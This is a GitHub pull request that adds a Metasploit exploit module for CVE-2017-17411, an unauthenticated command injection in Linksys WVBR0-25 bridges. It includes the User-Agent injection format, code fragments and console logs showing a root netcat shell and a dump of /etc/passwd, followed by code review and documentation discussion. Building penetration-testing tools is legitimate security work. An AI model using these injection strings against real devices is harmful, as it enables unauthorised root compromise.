Skip to content

Adds exploit module for CVE-2017-17411 #9336

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 7 commits into from
Jan 4, 2018
Merged

Conversation

headlesszeke
Copy link
Contributor

This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to ";<payload> #. This can be verified against WVBR0-25 devices running firmware < 1.0.41.

Example console output:

msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth 
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info

       Name: Linksys WVBR0-25 User-Agent Command Execution
     Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
   Platform: Unix
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-12-13

Provided by:
  HeadlessZeke

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                     yes       The target address
  RPORT    80               yes       The target port
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 1024

Description:
  The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to 
  connect wireless Genie cable boxes to the Genie DVR, is vulnerable 
  to OS command injection in version < 1.0.41 of the web management 
  portal via the User-Agent header. Authentication is not required to 
  exploit this vulnerability.

References:
  http://cvedetails.com/cve/2017-17411/
  http://www.zerodayinitiative.com/advisories/ZDI-17-973
  https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads 

Compatible Payloads
===================

   Name                     Disclosure Date  Rank    Description
   ----                     ---------------  ----    -----------
   cmd/unix/bind_netcat                      normal  Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/generic                          normal  Unix Command, Generic Command Execution
   cmd/unix/reverse_netcat                   normal  Unix Command Shell, Reverse TCP (via netcat)

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat 
payload => cmd/unix/bind_netcat
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
RHOST => 10.0.0.104
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] Started bind handler
[*] 10.0.0.104:80 - Exploiting...
[*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
id

uid=0(root) gid=0(root)
^C
Abort session 1? [y/N]  y

[*] 10.0.0.104 - Command shell session 1 closed.  Reason: User exit
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic 
payload => cmd/unix/generic
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd
cmd => cat /etc/passwd
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] 10.0.0.104:80 - Exploiting...
[+] 10.0.0.104:80 - Command sent successfully
[*] 10.0.0.104:80 - Command output:  root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nologin sshd:x:22:22::/var/empty:/sbin/nologin admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga:x:1001:1001:Quagga
[*] Exploit completed, but no session was created.
msf exploit(linksys_wvbr0_user_agent_exec_noauth) >

This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to `";<payload> #`. This can be verified against WVBR0-25 devices running firmware < 1.0.41.

Example console output:

```
msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth 
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info

       Name: Linksys WVBR0-25 User-Agent Command Execution
     Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
   Platform: Unix
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-12-13

Provided by:
  HeadlessZeke

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                     yes       The target address
  RPORT    80               yes       The target port
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 1024

Description:
  The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to 
  connect wireless Genie cable boxes to the Genie DVR, is vulnerable 
  to OS command injection in version < 1.0.41 of the web management 
  portal via the User-Agent header. Authentication is not required to 
  exploit this vulnerability.

References:
  http://cvedetails.com/cve/2017-17411/
  http://www.zerodayinitiative.com/advisories/ZDI-17-973
  https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads 

Compatible Payloads
===================

   Name                     Disclosure Date  Rank    Description
   ----                     ---------------  ----    -----------
   cmd/unix/bind_netcat                      normal  Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/generic                          normal  Unix Command, Generic Command Execution
   cmd/unix/reverse_netcat                   normal  Unix Command Shell, Reverse TCP (via netcat)

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat 
payload => cmd/unix/bind_netcat
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
RHOST => 10.0.0.104
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] Started bind handler
[*] 10.0.0.104:80 - Exploiting...
[*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
id

uid=0(root) gid=0(root)
^C
Abort session 1? [y/N]  y

[*] 10.0.0.104 - Command shell session 1 closed.  Reason: User exit
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic 
payload => cmd/unix/generic
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd
cmd => cat /etc/passwd
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] 10.0.0.104:80 - Exploiting...
[+] 10.0.0.104:80 - Command sent successfully
[*] 10.0.0.104:80 - Command output:  root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nologin sshd:x:22:22::/var/empty:/sbin/nologin admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga:x:1001:1001:Quagga
[*] Exploit completed, but no session was created.
msf exploit(linksys_wvbr0_user_agent_exec_noauth) >
```
'method' => 'GET',
'uri' => '/'
})
if res && res.code == 200 && res.body.to_s =~ /Firmware Version: (1\.0\.(40|[1-3][0-9]|[0-9])\.|0\.)/ # version < 1.0.41
Copy link
Contributor

@nixawk nixawk Dec 22, 2017

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

False positives can be here. Let's setup a simple http server for it

$ cat index.html
Vendor:LINKSYS ModelName:WVBR0-25-US Firmware Version: 1.0.35.163016 Firmware Builddate: 2014-08-26 18:05 Product.type: production Linux: Linux version 2.6.30 (root@build-vm) (gcc version 4.2.1 (ARC_2.3)) #1 Tue Aug 26 10:47:37 PDT 2014 Board: titans
$ python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

Try to check the vulnerability status as following:

msf exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > show options

Module options (exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > set RPORT 8080
RPORT => 8080
msf exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > check
[+] 127.0.0.1:8080 The target is vulnerable.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hmm...that is true, but then again I can't think of a way to check this that can't also be faked in the same way...

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I think @nixawk is suggesting a more unique string to fingerprint?

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Also, it should return CheckCode::Appears if it's just a version check.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Oh that’s an idea. If I have it echo back a random string at runtime, then it wouldn’t be possible to predict the response. I’ll do that instead.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yeah, that's the kind of check that would warrant CheckCode::Vulnerable. You even do it below with cmd/unix/generic. :)

return Exploit::CheckCode::Unknown
end

puts res.body.to_s
Copy link
Contributor

@nixawk nixawk Dec 22, 2017

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

  • puts is not recommended, and (vprint_* / print_*) can be used.
  • If status is vulnerable, we should not output http response directly in check function.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Gah! This was a debug message from my testing. Will remove it.

# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please remove require 'msf/core'.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Oh ok, removing.

[
['CVE', '2017-17411'],
['ZDI', '17-973'],
['URL', 'https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair']
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This was a good read. Didn't realize it was you, @headlesszeke!

##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Command injection that might be ExcellentRanking.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

heh, well if you say so ;)

'method' => 'GET',
'uri' => '/',
'headers' => {
'User-Agent' => "\"; printf \"#{check_str}"
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

You can use the top-level key agent instead of setting it in headers manually.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

will do

res = send_request_raw({
'method' => 'GET',
'uri' => '/',
'agent' => "\"; printf \"#{check_str}"
Copy link
Contributor

@nixawk nixawk Dec 22, 2017

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

echo <"string"> == printf <"string\n" >.

  • echo may be more stable.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I thought printf was the more reliable of the two. I used it so I wouldn’t have to deal with any newlines being fed to the md5sum along with the string, but I can change it if desired.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Since this is a device and not Joe Bob's random PHP app, and you have the device, you can check. It's probably BusyBox. If it has both, use either.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Oh yeah, it definitely has both. I think I’m just gonna leave it as is for simplicity.

@wvu
Copy link
Contributor

wvu commented Dec 27, 2017

I'm happy to handle this instead of just shepherding it if @headlesszeke is willing to test. :)

If you could add some quick docs as per https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation, that'd be fantastic. You can find examples under documentation/**/*.md. Thanks!

@wvu wvu self-assigned this Dec 27, 2017
@headlesszeke
Copy link
Contributor Author

Sorry for the delay over the holiday, doc file added (hopefully up to the usual standards)

@@ -0,0 +1,49 @@
## Vulnerable Application

This module exploits a command injection vulnerability in the [Linksys WVBR0-25](https://www.att.com/help/manuals/directv/dvrs.html) wireless video bridge. A description of the exploited vulnerability is available in the Vulnerability Details section of [this advisory](http://www.zerodayinitiative.com/advisories/ZDI-17-973/).
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

the link doesn't link to anything specifically, and I dont see linksys or WVBR0-25 on the page. Can we find a better link?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yeah, I kinda figured this question would come up. That page has a link to the wvbr0's manual under the wireless video bridge section and is the closest thing to a vendor product page I can find. I didn't link directly to the manual itself because it seemed in poor form to link to a pdf from metasploit. ;)

As I see it, there are two other options if we don't want that: I can either link to a 3rd party site that has a better description for the device but is not official (like https://www.solidsignal.com/pview.asp?p=wvb for example) or remove the link altogether...

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The page is fine I think if you were to say something like "(under the title foobar)" directing to where it was. I think adding an "unofficial" link is also a stellar idea. This way since either may change we have at least a base reference to go off of

2. Start msfconsole.
3. Do: ```use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth```
4. Do: ```set payload cmd/unix/bind_netcat```
5. Do: ```set RHOST <ip>```
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

change to square brackets

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Will do.

@h00die
Copy link
Contributor

h00die commented Jan 2, 2018

Docs look pretty good, 2 minor nit picks, but over all nice

@wvu
Copy link
Contributor

wvu commented Jan 3, 2018

Can you do one last test, @headlesszeke? I'll ship it after.

@headlesszeke
Copy link
Contributor Author

Just tested the module again for fun after making the doc changes. Everything still working beautifully. Thanks for the help!

wvu added a commit to wvu/metasploit-framework that referenced this pull request Jan 4, 2018
@wvu wvu merged commit 589de04 into rapid7:master Jan 4, 2018
@pbarry-r7
Copy link
Contributor

Release Notes

This new exploit module can achieve RCE on Linksys WVBR0-25 (wireless video bridge) devices running certain versions of firmware.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

7 participants